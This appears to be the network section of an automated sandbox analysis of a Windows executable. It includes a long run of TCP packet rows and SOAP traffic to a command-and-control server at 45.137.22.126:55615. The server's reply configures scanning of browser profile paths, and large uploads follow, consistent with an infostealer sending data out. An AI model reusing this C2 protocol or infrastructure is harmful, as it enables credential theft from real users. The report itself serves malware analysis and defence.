Nov 17, 2024 03:07:14.204998970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205010891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205117941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205128908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205169916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205180883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205230951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205241919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205308914 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205321074 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205369949 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205380917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205425024 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205436945 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205504894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205516100 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205566883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205578089 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205631018 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205642939 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205714941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205725908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205739021 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205791950 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205847025 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205890894 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205940962 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.205951929 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206003904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206015110 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206054926 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206075907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206156015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206167936 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206212044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206223011 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206310034 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206321001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206370115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206382036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206428051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206501961 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206512928 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206526041 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206567049 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206610918 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206686974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206697941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206743956 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206756115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206789970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206865072 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206876993 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.206888914 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207231998 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207243919 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207659960 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207672119 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207922935 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.207933903 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208002090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208044052 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208106995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208118916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208164930 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208177090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208252907 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208264112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208314896 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208374023 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208444118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208456039 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208513975 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208524942 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208583117 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208595037 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208628893 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208650112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208730936 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208775043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208856106 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208867073 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208918095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.208929062 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209000111 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209011078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209067106 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209079027 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209183931 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209194899 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209248066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209259033 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209312916 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209323883 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209364891 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209377050 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209414959 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209435940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209547997 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209559917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209573030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209634066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209646940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209686995 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209739923 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209772110 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209785938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209796906 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209876060 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209887981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209960938 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.209973097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210031033 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210042953 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210104942 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210117102 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210160017 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210181952 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210264921 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210285902 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210331917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210371971 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210432053 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210443974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210486889 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210498095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210553885 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210566044 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210616112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210627079 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210660934 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210695982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210767031 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210778952 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210855961 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210867882 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210920095 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210978985 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.210994005 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211042881 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211116076 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211127043 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211167097 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211213112 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211270094 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211282015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211337090 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211420059 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211431980 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211442947 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211482048 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211493969 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211566925 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211577892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211658001 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211707115 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211719036 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211775064 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211786032 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211854935 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211867094 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211914062 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211925030 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211937904 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.211976051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212034941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212045908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212084055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212129116 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212178946 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212189913 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212256908 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212268114 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212287903 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212299109 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212349892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212362051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212382078 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212393045 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212445974 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212457895 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212469101 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212490082 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212501049 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212512970 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212532997 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212543964 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212554932 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212567091 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212587118 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212598085 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212619066 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212629080 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212649107 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212661028 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212681055 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212692022 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212704897 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212744951 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212779999 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212806940 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212829113 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212842941 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212862015 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212872982 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212883949 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212894917 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212914944 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212925911 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212946892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212959051 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.212970972 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:14.256872892 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:15.467576981 CET	55615	49738	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:15.528460026 CET	49738	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:15.595179081 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:15.595650911 CET	49738	55615	192.168.2.4	45.137.22.126

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 03:07:08.826909065 CET	52844	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 17, 2024 03:07:08.826909065 CET	192.168.2.4	1.1.1.1	0x5ba4	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 17, 2024 03:07:08.833874941 CET	1.1.1.1	192.168.2.4	0x5ba4	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

45.137.22.126:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	45.137.22.126	55615	7712	C:\Users\user\Desktop\9dOKGgFNL2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 17, 2024 03:07:02.587853909 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 45.137.22.126:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 17, 2024 03:07:03.422421932 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 17 Nov 2024 02:07:02 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 17, 2024 03:07:08.471224070 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 45.137.22.126:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 17, 2024 03:07:08.786478996 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 17 Nov 2024 02:07:08 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	45.137.22.126	55615	7712	C:\Users\user\Desktop\9dOKGgFNL2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 17, 2024 03:07:11.420854092 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 45.137.22.126:55615 Content-Length: 928651 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 17, 2024 03:07:13.577146053 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 17 Nov 2024 02:07:12 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	45.137.22.126	55615	7712	C:\Users\user\Desktop\9dOKGgFNL2.exe

Timestamp	Bytes transferred	Direction	Data
Nov 17, 2024 03:07:13.584538937 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 45.137.22.126:55615 Content-Length: 928643 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 17, 2024 03:07:15.467576981 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 17 Nov 2024 02:07:14 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	21:06:57
Start date:	16/11/2024
Path:	C:\Users\user\Desktop\9dOKGgFNL2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9dOKGgFNL2.exe"
Imagebase:	0xff0000
File size:	534'528 bytes
MD5 hash:	020EC1DF3B8B9D28DA16EDAF0D50A262
Has elevated privileges:	true
Has administrator privileges:	true
